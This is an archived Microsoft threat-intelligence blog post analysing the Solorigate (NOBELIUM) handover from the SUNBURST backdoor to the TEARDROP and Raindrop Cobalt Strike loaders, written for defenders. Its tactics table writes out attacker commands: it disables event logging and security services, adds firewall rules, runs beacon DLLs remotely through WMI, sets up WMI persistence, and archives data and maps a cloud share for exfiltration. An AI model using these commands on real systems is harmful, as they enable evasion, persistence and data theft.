{
	"id": "df031e23-596c-4b8f-9f3a-5e36f253e995",
	"created_at": "2026-04-06T00:20:11.85993Z",
	"updated_at": "2026-04-10T03:37:32.632906Z",
	"deleted_at": null,
	"sha1_hash": "a8440c5ab81f56ad010d64479dc9007c203eab1c",
	"title": "Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1230180,
	"plain_text": "Deep dive into the Solorigate second-stage activation: From SUNBURST\r\nto TEARDROP and Raindrop\r\nBy Microsoft Cyber Defense Operations Center (CDOC), Microsoft Threat Intelligence\r\nPublished: 2021-01-20 · Archived: 2026-04-05 21:17:04 UTC\r\nUPDATE: Microsoft continues to work with partners and customers to expand our knowledge of the threat actor behind the\r\nnation-state cyberattacks that compromised the supply chain of SolarWinds and impacted multiple other organizations.\r\nMicrosoft previously used ‘Solorigate’ as the primary designation for the actor, but moving forward, we want to place\r\nappropriate focus on the actors behind the sophisticated attacks, rather than one of the examples of malware used by the\r\nactors. Microsoft Threat Intelligence Center (MSTIC) has named the actor behind the attack against SolarWinds, the\r\nSUNBURST backdoor, TEARDROP malware, and related components as NOBELIUM. As we release new content and\r\nanalysis, we will use NOBELIUM to refer to the actor and the campaign of attacks.\r\nMore than a month into the discovery of Solorigate, investigations continue to unearth new details that prove it is one of the\r\nmost sophisticated and protracted intrusion attacks of the decade. Our continued analysis of threat data shows that the\r\nattackers behind Solorigate are skilled campaign operators who carefully planned and executed the attack, remaining\r\nelusive while maintaining persistence. These attackers appear to be knowledgeable about operations security and\r\nperforming malicious activity with minimal footprint. In this blog, we’ll share new information to help better understand\r\nhow the attack transpired. 
Our goal is to continue empowering the defender community by helping to increase their ability\r\nto hunt for the earliest artifacts of compromise and protect their networks from this threat.\r\nWe have published our in-depth analysis of the Solorigate backdoor malware (also referred to as SUNBURST by FireEye),\r\nthe compromised DLL that was deployed on networks as part of SolarWinds products, that allowed attackers to gain\r\nbackdoor access to affected devices. We have also detailed the hands-on-keyboard techniques that attackers employed on\r\ncompromised endpoints using a powerful second-stage payload, one of several custom Cobalt Strike loaders, including the\r\nloader dubbed TEARDROP by FireEye and a variant named Raindrop by Symantec.\r\nOne missing link in the complex Solorigate attack chain is the handover from the Solorigate DLL backdoor to the Cobalt\r\nStrike loader. Our investigations show that the attackers went out of their way to ensure that these two components are\r\nseparated as much as possible to evade detection. This blog provides details about this handover based on a limited number\r\nof cases where this process occurred. To uncover these cases, we used the powerful, cross-domain optics of Microsoft 365\r\nDefender to gain visibility across the entire attack chain in one complete and consolidated view.\r\nWe’ll also share our deep dive into additional hands-on-keyboard techniques that the attackers used during initial\r\nreconnaissance, data collection, and exfiltration, which complement the broader TTPs from similar investigative blogs,\r\nsuch as those from FireEye and Volexity.\r\nThe missing link: From the Solorigate backdoor to Cobalt Strike implants\r\nAn attack timeline that SolarWinds disclosed in a recent blog showed that a fully functional Solorigate DLL backdoor was\r\ncompiled at the end of February 2020 and distributed to systems sometime in late March.  
The same blog also said that the\r\nattackers removed the Solorigate backdoor code from SolarWinds’ build environment in June 2020.\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 1 of 21\n\nConsidering this timeline and the fact that the Solorigate backdoor was designed to stay dormant for at least two weeks, we\r\napproximate that the attackers spent a month or so in selecting victims and preparing unique Cobalt Strike implants as well\r\nas command-and-control (C2) infrastructure. This approximation means that real hands-on-keyboard activity most likely\r\nstarted as early as May.\r\nThe removal of the backdoor-generation function and the compromised code from SolarWinds binaries in June could\r\nindicate that, by this time, the attackers had reached a sufficient number of interesting targets, and their objective shifted\r\nfrom deployment and activation of the backdoor (Stage 1) to being operational on selected victim networks, continuing the\r\nattack with hands-on-keyboard activity using the Cobalt Strike implants (Stage 2).\r\nFigure 1. Timeline of the protracted Solorigate attack\r\nBut how exactly does this jump from the Solorigate backdoor (SUNBURST) to the Cobalt Strike loader (TEARDROP,\r\nRaindrop, and others) happen? What code gets triggered, and what indicators should defenders look for?\r\nFigure 2. Diagram of transition between Stage 1 and Stage 2 of the Solorigate attack\r\nSophisticated attackers like those behind Solorigate have a goal of expansion and stealthy persistence to maximize the\r\namount of time they can remain undetected and collect valuable information. 
It’s important for organizations to be able to\r\nlook at forensic data across their entire environment to see how far attackers have traversed the network and how long they\r\nwere there, in order to have confidence that attacks have been properly remediated from the environment. The best way to\r\ndo that is with an extended detection and response (XDR) solution that enables organizations to replay past events to look\r\nfor activity that might reveal the presence of an attacker on the network. Affected organizations without an XDR solution\r\nlike Microsoft 365 Defender in place will have a difficult job of performing incident response.\r\nWhat we found from our hunting exercise across Microsoft 365 Defender data further confirms the high level of skill of the\r\nattackers and the painstaking planning of every detail to avoid discovery. To illustrate, the following diagram shows the\r\nentry vector attack chain at a glance:\r\nFigure 3. Transition from Solorigate backdoor to Cobalt Strike\r\nWe spent countless hours investigating Microsoft Defender telemetry and other signals from potential patient-zero\r\nmachines running the backdoored version of SolarWinds DLL. Most of these machines communicated with the initial\r\nrandomly generated DNS domain .avsvmcloud.com but without significant activity (step #1). However, we saw limited\r\ncases in May and June where the initial DNS network communication was closely followed by network activity on port 443\r\n(HTTPS) to other legit-looking domains (step #7). 
On these handful of machines, we performed deep inspection of\r\ntelemetry.\r\nWe know that the Solorigate backdoor only activates for certain victim profiles, and when this happens, the executing\r\nprocess (usually SolarWinds.BusinessLayerHost.exe) creates two files on disk (step #2):\r\nA VBScript, typically named after existing services or folders to blend into legitimate activities on the machine\r\nA second-stage DLL implant, a custom Cobalt Strike loader, typically compiled uniquely per machine and written\r\ninto a legitimate-looking subfolder in %WinDir% (e.g., C:\\Windows)\r\nAt this point the attackers are ready to activate the Cobalt Strike implant. However, the attackers apparently deem the\r\npowerful SolarWinds backdoor too valuable to lose in case of discovery, so they tried to separate the Cobalt Strike loader’s\r\nexecution from the SolarWinds process as much as possible. Their hope is that, even if they lose the Cobalt Strike implant\r\ndue to detection, the compromised SolarWinds binary and the supply chain attack that preceded it are not exposed.\r\nThe attackers achieved this by having the SolarWinds process create an Image File Execution Options (IFEO) Debugger\r\nregistry value for the process dllhost.exe (step #3). This is a known MITRE ATT\u0026CK technique used for persistence, but it\r\ncould also be abused to trigger execution of malicious code when a certain process is launched. Once the registry value is\r\ncreated, the attackers simply wait for the occasional execution of dllhost.exe, which might happen naturally on a system.\r\nThis execution triggers a process launch of wscript.exe configured to run the VBScript file dropped in step #4.\r\nThe VBScript in turn runs rundll32.exe, activating the Cobalt Strike DLL (step #5) using a clean parent/child process tree\r\ncompletely disconnected from the SolarWinds process. 
Finally, the VBScript removes the previously created IFEO value to\r\nclean up any traces of execution (step #6) and also deletes the following registry keys related to HTTP proxy:\r\nHKEY_CURRENT_USER\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoDetect\r\nHKEY_CURRENT_USER\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL\r\nAnalyzing the custom Cobalt Strike loaders\r\nIn our investigation, we identified several second-stage malware, including TEARDROP, Raindrop, and other custom\r\nloaders for the Cobalt Strike beacon. During the lateral movement phase, the custom loader DLLs are dropped mostly in\r\nexisting Windows sub-directories. Below are some example paths (additional paths are listed at the end of this blog):\r\nC:\\Windows\\ELAMBKUP\\WdBoot.dll\r\nC:\\Windows\\Registration\\crmlog.dll\r\nC:\\Windows\\SKB\\LangModel.dll\r\nC:\\Windows\\AppPatch\\AcWin.dll\r\nC:\\Windows\\PrintDialog\\appxsig.dll\r\nC:\\Windows\\Microsoft.NET\\Framework64\\sbscmp30.dll\r\nC:\\Windows\\Panther\\MainQueueOnline.dll\r\nC:\\Windows\\assembly\\GAC_64\\MSBuild\\3.5.0.0__b03f5f7f11d50a3a\\msbuild.dll\r\nC:\\Windows\\LiveKernelReports\\KerRep.dll\r\nThe files have names that resemble legitimate Windows file and directory names, once again demonstrating how the\r\nattackers attempted to blend in the environment and hide in plain sight:\r\nLegitimate Windows file/directory | Malicious custom loader\r\nC:\\Windows\\ELAMBKUP\\WdBoot.sys | C:\\Windows\\ELAMBKUP\\WdBoot.dll\r\nC:\\Windows\\Registration\\CRMLog | C:\\Windows\\Registration\\crmlog.dll\r\nC:\\Windows\\SKB\\LanguageModels | C:\\Windows\\SKB\\LangModel.dll\r\nC:\\Windows\\AppPatch\\AcRes.dll | C:\\Windows\\AppPatch\\AcWin.dll\r\nC:\\Windows\\PrintDialog\\appxsignature.p7x | C:\\Windows\\PrintDialog\\appxsig.dll\r\nC:\\Windows\\Microsoft.NET\\Framework64\\sbscmp10.dll | C:\\Windows\\Microsoft.NET\\Framework64\\sbscmp30.dll\r\nC:\\Windows\\Panther\\MainQueueOnline0.que | C:\\Windows\\Panther\\MainQueueOnline.dll\r\nC:\\Windows\\assembly\\GAC_64\\MSBuild\\3.5.0.0__b03f5f7f11d50a3a\\MSBuild.exe | C:\\Windows\\assembly\\GAC_64\\MSBuild\\3.5.0.0__b03f5f7f11d50a3a\\msbuild.dll\r\nTEARDROP, Raindrop, and the other custom Cobalt Strike Beacon loaders observed during the Solorigate investigation are\r\nlikely generated using custom Artifact Kit templates. Each custom loader loads either a Beacon Reflective Loader or a\r\npreliminary loader that subsequently loads the Beacon Reflective Loader. Reflective DLL loading is a technique for loading\r\na DLL into a process memory without using the Windows loader.\r\nFigure 4. Structure of the two variants of Cobalt Strike Beacon loaders observed in Solorigate attacks\r\nIn the succeeding sections, we discuss the Cobalt Strike Beacon variants we observed in our Solorigate investigations.\r\nVariant 1: TEARDROP\r\nTo date, Microsoft has analyzed two versions of the second-stage custom Cobalt Strike Beacon loader known as\r\nTEARDROP (detected as Trojan:Win64/Solorigate.SA!dha by Microsoft):\r\nA service DLL (loaded by svchost.exe) with a ServiceMain function typically named NetSetupServiceMain\r\nA standard non-Service DLL loaded by rundll32.exe\r\nIrrespective of the loading methodology, both versions have an export function that contains the trigger for the malicious\r\ncode. The malicious code is executed in a new thread created by the export function. Upon execution, the malicious code\r\nattempts to open a file with a .jpg extension (e.g., festive_computer.jpg, upbeat_anxiety.jpg, gracious_truth.jpg,\r\nand confident_promotion.jpg). 
Further analysis is required to determine the purpose and role of the .jpg file referenced by\r\neach sample. The code also checks the presence of the Windows registry key SOFTWARE\\Microsoft\\CTF and terminates if\r\nthe registry key is present or accessible. Next, the code proceeds to decode and subsequently execute an embedded custom\r\npreliminary loader.\r\nFigure 5. Structure of Variant 1 custom loader\r\nThe preliminary loader used by this variant of custom loader is typically generated using a Cobalt Strike Artifact Kit\r\ntemplate (e.g., bypass-pipe.c):\r\nFigure 6. Disassembled function from preliminary loader compiled from Artifact Kit’s bypass-pipe.c template\r\nIn its true form, the custom Artifact Kit-generated preliminary loader is a DLL that has been transformed and loaded like\r\nshellcode in memory. The preliminary loader is responsible for loading the next-stage component, which is a Beacon\r\nReflective Loader/DLL (Cobalt Strike Beacon is compiled as a reflective DLL). The Reflective Loader ultimately\r\ninitializes and executes Beacon in memory.\r\nVariant 2: Additional custom loaders\r\nIn our investigations, we came across additional custom loaders for Cobalt Strike’s Beacon that appear to be generated\r\nusing custom Cobalt Strike Artifact Kit templates. Unlike TEARDROP, in which the malicious code is triggered by an\r\nexport function, the malicious code in these variants is triggered directly from the DLL’s entry point, which creates a new\r\nthread to execute the malicious code. 
These Variant 2 custom loaders also contain an attacker-introduced export (using\r\nvarying names) whose only purpose is to call the Sleep() function every minute.\r\nFigure 7. Example of a custom export function from a Variant 2 loader\r\nAdditionally, unlike TEARDROP, these variants do not contain a custom preliminary loader, meaning the loader DLL de-obfuscates and subsequently executes the Cobalt Strike Reflective DLL in memory.\r\nFigure 8. Structure of Variant 2 custom Loader\r\nThese custom loaders can be further divided into two types:\r\nType A: A set of large DLLs that decode and load the Cobalt Strike Reflective Loader from the DLL’s DATA section\r\n(detected as Trojan:Win64/Solorigate.SC!dha by Microsoft)\r\nType B: A set of smaller DLLs that de-obfuscate and load the Reflective Loader from the DLL’s CODE section (also\r\nreferred to as Raindrop by Symantec, detected as Trojan:Win64/Solorigate.SB!dha by Microsoft)\r\nFigure 9. Two subtypes of the custom Loader\r\nThe ultimate goal of both Type A and B loaders is to de-obfuscate and load a Cobalt Strike Reflective Loader in memory.\r\nType A loaders use a simple rolling XOR methodology to decode the Reflective Loader, while Type B loaders (Raindrop)\r\nutilize a combination of the AES-256 encryption algorithm (unique key per sample), LZMA compression, and a single-byte\r\nXOR decoding routine to de-obfuscate the embedded Reflective Loader in memory. 
At the conclusion of the de-obfuscation\r\nprocess, both variants proceed to load the Reflective Loader in memory, which subsequently executes Cobalt Strike Beacon\r\nin memory.\r\nForensic observations about the Solorigate Cobalt Strike loaders\r\nMetadata and timeline analysis of the custom loaders, combined with analysis of the configuration data extracted from each\r\nBeacon payload, led to following discoveries:\r\nThe custom loader DLLs were introduced to compromised systems between the hours of 8:00 AM and 5:00 PM\r\nUTC. In one intrusion, the first second-stage custom loader (TEARDROP) was introduced to the environment\r\nby BusinessLayerHost.exe at around 10:00 AM UTC.\r\nThe custom loader DLLs dropped on disk carried compile timestamps ranging from July 2020 to October 2020,\r\nwhile the embedded Reflective DLLs carried compile timestamps ranging from March 2016 to November 2017. The\r\npresence of 2016-2017 compile timestamps is likely due to attackers’ usage of custom Malleable C2 profiles with\r\nsynthetic compile timestamp (compile_time) values. At first glance it would appear as if the actor did not timestamp\r\nthe compile time of the custom loader DLLs (2020 compile timestamps). However, forensic analysis of\r\ncompromised systems revealed that in a few cases, the timestamp of the custom loader DLLs’ introduction to\r\nsystems predated the compile timestamps of the custom loader DLLs (i.e., the DLLs appear to have been compiled\r\nat a future date).\r\nBoth Variant 1 and 2 custom loader DLLs were configured with PE version information that masquerades version\r\ninformation belonging to legitimate applications and files from Windows (e.g., DLL), 7-Zip (e.g., 7z.dll), Far\r\nManager (e.g., Far.dll), LibIntl (e.g., libintl3.dll), and other legitimate applications. 
The Variant 2 custom loaders\r\nwere mostly compiled from open-source source code of legitimate applications, such as 7-Zip and Far Manager (i.e.,\r\nthe open-source source code for these applications was modified to add in the malicious code). In some instances,\r\ncertain development artifacts were left behind in the custom loader samples. For example, the following C++ header\r\n(.hpp) path was observed in a loader compiled from a modified Far Manager open-source source code\r\n(c:\\build\\workspace\\cobalt_cryptor_far (dev071)\\farmanager\\far\\platform.concurrency.hpp):\r\nFigure 10. File path for a C++ header file (.hpp) observed in custom Cobalt Strike loader samples\r\nEach custom loader DLL contains a designated PE export function that either triggers the malicious functionality of\r\nthe loader (in Variant 1) or calls the Sleep() function (Variant 2). 
A non-comprehensive list of these PE export\r\nfunction names (one per loader DLL) is included below (note the repeating “Tk” prefix in the export names that can\r\nbe a useful indicator for hunting purposes):\r\n__GetClasterInf\r\nFreeSetupRevoke\r\nTk_GetRootCoords\r\nTkComputeAnchor\r\nTkpSetMainMenubar\r\n__RtlProjectObj\r\nGetLimitStroke\r\nTk_IntersectTextLayout\r\nTkDebugBorder\r\nTkSelPropProc\r\n__TkGlobal\r\nNetSetupServiceMain\r\nTk_NameOf3DBorder\r\nTkFindStateString\r\nTkWinCancelMouseTimer\r\n_XInitImageFuncPtrs\r\nRestVirtAlloc\r\nTk_PostscriptImage\r\nTkGetDefaultScreenName\r\nTkWinClipboardRender\r\nCreateLocalThread\r\nSetTkPrv\r\nTk_QueryAllocMem\r\nTkGrabState\r\nXClearWindow\r\nCreateProcessTVI\r\nTk_GetElementBox\r\nTk_SizeOfImage\r\nTkpSetKeycodeAndState\r\nXCreateBitmapFromData\r\nIn addition to the attackers dropping the custom loaders in unique locations on each system during the lateral\r\nmovement phase, most Beacon and Reflective Loader instances discovered during our investigation were configured\r\nwith a unique C2 domain name, unique Watermark ID, unique PE compile timestamp, PE Original Name (), DNS\r\nIdle IP (e.g., 84[.]200[.]70[.]40, 208[.]67[.]220[.]220, 208[.]67[.]222[.]222, 9[.]9[.]9[.]9, and 8[.]8[.]4[.]4),\r\nunique User-Agent and HTTP POST/GET transaction URI, sleep time, and jitter factor. This is notable since no two\r\nBeacon instances shared the same C2 domain name, Watermark, or other aforementioned configuration values.\r\nOther than certain internal fields, most Beacon configuration fields are customizable via a Malleable C2 profile. If\r\nthe actor did indeed use custom Malleable C2 profiles, as evidenced in the list above, the profiles varied greatly for\r\nBeacon instances used during different lateral movement campaigns within the same network. 
As mentioned above,\r\neach Beacon instance carries a unique Watermark value. Analysis of the Watermark values revealed that all\r\nWatermark values start with the number ‘3’, for example:\r\n0x30343131 0x34353633 0x38303535 0x38383238\r\n0x32323638 0x35373331 0x38353138 0x38383430\r\nAs for post-exploitation artifacts, the observed Beacon instances were configured to use different “spawnto” values,\r\nwhich Cobalt Strike uses to spawn a temporary process and inject its post-exploitation-related components or\r\nfeatures into the spawned process. This detail could be valuable for hunting process creation events originated\r\nby exe. Below are some example paths used by the observed Beacon instances:\r\n%WINDIR%\\System32\\conhost.exe\r\n%WINDIR%\\System32\\control.exe\r\n%WINDIR%\\System32\\dllhost.exe\r\n%WINDIR%\\System32\\help.exe\r\n%WINDIR%\\System32\\LogonUI.exe\r\n%WINDIR%\\System32\\msiexec.exe\r\n%WINDIR%\\System32\\print.exe\r\n%WINDIR%\\SysWOW64\\audiodg.exe\r\n%WINDIR%\\SysWOW64\\help.exe\r\n%WINDIR%\\SysWOW64\\msiexec.exe\r\n%WINDIR%\\SysWOW64\\msinfo32.exe\r\n%WINDIR%\\SysWOW64\\print.exe\r\n%WINDIR%\\SysWOW64\\WerFault.exe\r\nAdditional attacker tactics, anti-forensic behavior, and operational security\r\nAs mentioned, the attackers behind Solorigate are skillful and methodic operators who follow operations security (OpSec)\r\nbest practices to minimize traces, stay under the radar, and avoid detection.\r\nDuring our in-depth analysis of the attacker’s tactics, techniques, and procedures (TTPs) seen through the lens of Microsoft\r\n365 Defender’s rich telemetry, we observed a few techniques that are worth disclosing to help other defenders better\r\nrespond to this incident and use hunting tools like Microsoft 365 Defender advanced hunting or Azure Sentinel queries to\r\nsearch for potential traces of past activity.\r\nSome examples of why these attackers stand out for their professional OpSec methodology and anti-forensic behavior are\r\nlisted 
below:\r\nMethodic avoidance of shared indicators for each compromised host. As discussed in the previous section, each\r\nCobalt Strike DLL implant was prepared to be unique per machine and avoided at any cost overlap and reuse of\r\nfolder name, file name, export function names, C2 domain/IP, HTTP requests, timestamp, file metadata, config, and\r\nchild process launched. This extreme level of variance was also applied to non-executable entities, such as WMI\r\npersistence filter name, WMI filter query, passwords used for 7-zip archives, and names of output log files. Applying\r\nthis level of permutations for each individual compromised machine is an incredible effort normally not seen with\r\nother adversaries and done to prevent full identification of all compromised assets inside a network or effective\r\nsharing of threat intel between victims.\r\nCamouflage and blending into the environment. Tools and binaries used by the attackers (e.g., ADFIND legit tool)\r\nwere always renamed and placed in folders that mimicked existing programs and files already present on a machine.\r\nThis blending was not just used for files, but for other elements. 
For example, WMI persistence filters were created\r\nwith names and queries matching other scripts present in affected organizations.\r\nBefore running intensive and continued hands-on keyboard activity, the attackers took care of disabling event\r\nlogging using AUDITPOL and re-enabling it afterward.\r\nIn a similar way, before running noisy network enumeration activities (such as repeated NSLOOKUP or LDAP\r\nqueries), the attackers carefully prepared special firewall rules to minimize outgoing packets for certain protocols.\r\nThe firewall rules were also methodically removed after the network reconnaissance was completed.\r\nLateral movement activities were never executed without preparation. To increase the likelihood that their activities\r\nremain undetected, the attackers first enumerated remote processes and services running on the target host and\r\ndecided to move laterally only after disabling certain security services.\r\nWe believe that the attackers used timestomping to change timestamps of artifacts and also leveraged professional\r\nwiping procedures and tools to complicate finding and recovering of DLL implants from affected environments.\r\nSee some of the most interesting and unique TTPs in the table below. In most cases, commands and tools are executed via\r\nan intermediate “cmd.exe /C” process launched from the Cobalt Strike main parent process. We are actively working with\r\nMITRE to make sure that any novel technique emerging from this incident is documented in future updates of the\r\nATT\u0026CK framework.\r\nObserved attacker behavior Example MITRE ATT\u0026CK\r\nAttackers always ran the\r\nTEARDROP implant\r\nthrough rundll32.exe,\r\nwhich is also the main\r\nprocess used in\r\ncommunicating with the\r\nC2.Execution of additional\r\ncommands from\r\nrundll32.exe seemed to be\r\noften interleaved with\r\n“cmd.exe /C”. 
This info can\r\nbe useful for hunting this\r\nspecific process tree chain\r\nas showed in the\r\nexample.When the\r\nattackers needed to execute\r\nmore risky actions on\r\nobjectives (e.g., credential\r\ntheft, or recon), they\r\nspawned an additional\r\ndllhost.exe process with no\r\nProcess-Tree:\r\nrundll32.exe c:\\windows\\[folder]\\[beacon].dll\r\n[export]\r\n-\u003e cmd.exe /C\r\n-\u003e [additional command]\r\nT1218.011 |\r\nDefense Evasion –\r\nSigned Binary\r\nProxy Execution:\r\nRundll32\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 12 of 21\n\ncommand-line, which is a\r\nrare event.\r\nWhen executed during\r\nlateral movement,\r\nrundll32.exe ran through\r\nWMIC or Invoke-WMIMethod with “High”\r\nintegrity level and spawned\r\nby WmiPrvSE.exe, which\r\nis a rare combination. The\r\nCobalt Strike DLL was\r\nlikely deleted after\r\ncompleted execution to\r\navoid forensic recovery.\r\nVariant1 (executed from PowerShell as a result of\r\nissuing the “remote-exec” Cobalt Strike\r\ncommand):Invoke-WMIMethod win32_process -\r\nname create -argumentlist ‘rundll32 c:\\Windows\\\r\n[folder]\\[beacon].dll [export]’ -ComputerName\r\n[target]Variant2 (executed from\r\nrundll32.exe):wmic /node:[target] process call\r\ncreate “rundll32 c:\\windows\\[folder]\\[beacon].dll\r\n[export]”\r\nT1047 | Windows\r\nManagement\r\nInstrumentation\r\n(WMI)\r\nA WMI event filter was\r\nused to invoke a command-line event consumer at\r\nsystem boot time to launch\r\na backdoor with\r\nrundll32.exe.\r\ninstance of __eventfilter\r\n{\r\neventnamespace = “”root\\\\cimv2″”;\r\nname = “”__timeritem””;\r\nquery = “”select * from\r\n__instancemodificationevent within 70 where\r\ntargetinstance isa\r\n‘win32_perfformatteddata_perfos_system’ and\r\ntargetinstance.systemuptime \u003e= 300 and\r\ntargetinstance.systemuptime \u003c 400″”;\r\nquerylanguage = “”wql””;\r\n};\r\nperm. 
consumer:\r\ninstance of commandlineeventconsumer\r\n{\r\ncommandlinetemplate =\r\n“”c:\\\\windows\\\\system32\\\\rundll32.exe\r\nc:\\\\windows\\\\[folder]\\\\[beacon].dll, [export]””;\r\nexecutablepath =\r\n“”c:\\\\windows\\\\system32\\\\rundll32.exe””;\r\nname = “”setpolicytrace””;\r\n};\r\nT1546.003 |\r\nPersistence –\r\nEvent Triggered\r\nExecution:\r\nWindows\r\nManagement\r\nInstrumentation\r\nEvent Subscription\r\nAttackers used AUDITPOL\r\nto prevent the collection of\r\nadditional audit logs and\r\nevidence trail.\r\nauditpol /GET /category:”Detailed Tracking”\r\nauditpol /set /category:”Detailed Tracking”\r\n/success:disable /failure:disable[execution of\r\nseveral commands and actions]auditpol /set\r\n/category:”Detailed Tracking” /success:enable\r\n/failure:enable\r\nT1562.002 |\r\nDefense Evasion –\r\nImpair Defenses:\r\nDisable Windows\r\nEvent Logging\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 13 of 21\n\nAttackers used NETSH to\r\nconfigure firewall rules that\r\nlimit certain UDP outbound\r\npackets (to reduce noise or\r\nfootprint) before intense\r\nrecon with NSLOOKUP\r\nand ADFIND.\r\nnetsh advfirewall firewall add rule\r\nname=”[rulename1]” protocol=UDP dir=out\r\nlocalport=137 action=block\r\nnetsh advfirewall firewall add rule\r\nname=”[rulename2]” protocol=UDP dir=out\r\nlocalport=53 action=block[execution of several\r\nnetwork recon]netsh advfirewall firewall delete\r\nrule name=”[rulename1]”\r\nnetsh advfirewall firewall delete rule\r\nname=”[rulename2]”\r\nT1562.004 |\r\nDefense Evasion –\r\nImpair Defenses:\r\nDisable or Modify\r\nSystem Firewall\r\nAttackers used fsutil to\r\ncheck available free space\r\nbefore executing collection,\r\nenumeration, exfiltration,\r\nor launching attacks like\r\nDCSync which might\r\ncreate large files on disk.\r\nfsutil volume diskfree c:\r\nAttackers used multiple\r\ncommand-line utilities 
to\r\nenumerate running process,\r\nservices, and signed-in\r\nusers on a remote system\r\nbefore attempting lateral\r\nmovement.\r\n– tasklist /v /s [target]\r\n– query user /server:[target]\r\n– schtasks /query /v /s [target] /fo csv\r\n– sc \\\\[target] query type=service state=all\r\n– wmic /node:”[target]” service get\r\nname,startname\r\nT1047 | Windows\r\nManagement\r\nInstrumentation\r\n(WMI),\r\nT1057 | Process\r\nDiscovery\r\nAttackers used the service\r\ncontrol manager on a\r\nremote system to disable\r\nservices associated with\r\nsecurity monitoring\r\nproducts. They then moved\r\nlaterally to the remote\r\nsystem and, when the move\r\nwas complete, they re-enabled the services on the\r\nsource machine where they\r\nwere operating previously\r\nto avoid raising warnings.\r\nOn Source Machine:sc \\\\[dest_machine] stop\r\n[service name][perform lateral move Source-\r\n\u003eDest]Once on Dest Machine:sc \\\\\r\n[source_machine] start [service name]\r\nT1562.001 |\r\nDefense Evasion –\r\nImpair Defenses:\r\nDisable or Modify\r\nTools\r\nAttackers set the service\r\nstart registry key for\r\nsecurity monitoring\r\nproducts to “disabled” (i.e.,\r\nDWORD value of “4”).\r\nThis prevented security\r\nreg add HKLM\\system\\currentcontrolset\\services\\\r\n[service name] /v Start /t REG_DWORD /d 4″\r\nT1562.001 |\r\nDefense Evasion –\r\nImpair Defenses:\r\nDisable or Modify\r\nTools\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 14 of 21\n\nproducts from loading\r\nwhen the system starts. 
In some cases, the attackers waited to perform activity on the system until the system restarted and security monitoring products were disabled.\r\nAttackers modified timestamps of backdoors to match a legitimate Windows file (e.g., arp.exe).\r\nn/a\r\nT1070.006 | Indicator Removal on Host: Timestomp\r\nAttackers used the 7-zip utility to create a password-protected archive with an extension not associated with archive files. In some cases they also used the flag “-v” to split the archive into multiple files for easier exfiltration.\r\n7z.exe a -mx9 -r0 -p[password-redacted] .\\[filename1].zip .\\[filename2].log or .txt\r\n7z.exe a -v500m -mx9 -r0 -p[password-redacted] .\\[filename1].zip .\\[filename2].log or .txt\r\nT1560.001 | Archive Collected Data: Archive via Utility\r\nAttackers mapped a OneDrive share from the command line using the net.exe command-line utility, possibly for exfiltration; other cloud services like Google Drive were most likely also used.\r\nnet use [drive]: \"https://d.docs.live.net/[user-id]\" /u:[username] [password]\r\nT1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage\r\nAttackers attempted to access Group Managed Service Account (gMSA) passwords with account credentials they had already obtained.\r\nn/a\r\nT1555 | Credentials from Password Stores\r\nAttackers leveraged privileged accounts to replicate directory service data with Domain Controllers (e.g., a DCSync attack).\r\nn/a\r\nT1003.006 | OS Credential Dumping: DCSync\r\nAttackers obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principal Names (SPNs) to crack offline (e.g.,
Kerberoasting).\r\nn/a\r\nT1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting\r\nAttackers executed the legitimate ADFIND tool multiple times to enumerate domains, remote systems, and accounts, and to discover trusts between federated domains. The tool was executed under a renamed filename chosen to blend into the existing environment or to mimic existing network services.\r\n[renamed-adfind].exe -h [internal domain] -sc u:[user] \u003e .\\\\[machine]\\[file].[log|txt]\r\n[renamed-adfind].exe -sc u:* \u003e .\\[folder]\\[file].[log|txt]\r\n[renamed-adfind].exe -h [machine] -f (name=\"Domain Admins\") member -list |\r\n[renamed-adfind].exe -h [machine] -f objectcategory=* \u003e .\\[folder]\\[file].[log|txt]\r\nSome examples of [renamed-adfind] observed by Microsoft and other security researchers:\r\nSearchIndex.exe\r\nsqlceip.exe\r\npostgres.exe\r\nIxNetwork.exe\r\ncsrss.exe\r\nT1482 | Domain Trust Discovery, T1018 | Remote System Discovery\r\nConclusion\r\nAs we continue to gain a deeper understanding of the Solorigate attack, we get a clearer picture of the skill level of the attackers and the extent of planning they put into pulling off one of the most sophisticated attacks in recent history. The combination of a complex attack chain and a protracted operation means that defensive solutions need to have comprehensive cross-domain visibility into attacker activity and provide months of historical data with powerful hunting tools to investigate as far back as necessary.\r\nModern attacks like Solorigate highlight the need for organizations to use advanced security solutions like Microsoft 365 Defender and Azure Sentinel and operate security response under an “assume breach” mentality.
Microsoft 365 Defender harnesses the power of multiple capabilities and coordinates protection across domains to provide comprehensive defense. Azure Sentinel collects data from multiple data sources, including Microsoft 365 Defender, to connect data together and allow broad hunting for attacker activity.\r\nIn our ongoing forensic analysis of known Solorigate cases with malicious activity occurring between May and November 2020, we have in some instances seen the following relevant alerts generated by Microsoft Defender for Endpoint and Microsoft Defender for Identity. Incident responders and defenders investigating Solorigate incidents during that timeframe can refer to these alerts, alone or in combination, as potential indicators of Solorigate activity.\r\nMicrosoft Defender for Endpoint alerts:\r\nLow-reputation arbitrary code executed by signed executable\r\nSuspicious ‘Atosev’ behavior was blocked\r\nSuspicious Remote WMI Execution\r\nA WMI event filter was bound to a suspicious event consumer\r\nMicrosoft Defender for Identity alerts:\r\nUser and IP address reconnaissance (SMB)\r\nSuspected Kerberos SPN exposure\r\nFigure 11. Alert raised by Microsoft Defender for Endpoint on Solorigate-related malicious activity in June 2020\r\nThe disclosure of the Solorigate attack and the investigations that followed unearthed more details and intelligence that we used to improve existing detections and build new ones.
